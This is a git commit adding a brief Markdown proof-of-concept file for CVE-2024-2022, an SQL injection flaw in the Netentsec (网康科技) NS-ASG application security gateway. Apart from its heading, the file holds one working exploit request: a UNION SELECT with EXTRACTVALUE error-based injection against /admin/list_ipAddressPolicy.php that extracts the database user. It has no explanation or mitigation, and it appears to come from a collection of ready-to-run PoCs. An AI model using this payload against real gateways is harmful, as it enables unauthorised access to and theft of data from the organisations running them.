Create 网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md

2025-02-27 04:39:25 +00:00 · 2024-03-12 18:40:37 +08:00 · 2024-03-12 18:40:37 +08:00 · 5c3996ebe8
commit 5c3996ebe8
parent 05811c05d2
1 changed files with 7 additions and 0 deletions
--- a/网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md
+++ b/网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md
@ -0,0 +1,7 @@
 ## 网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022)
 ## poc
 ```
 /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+user()),0x7e))
 ```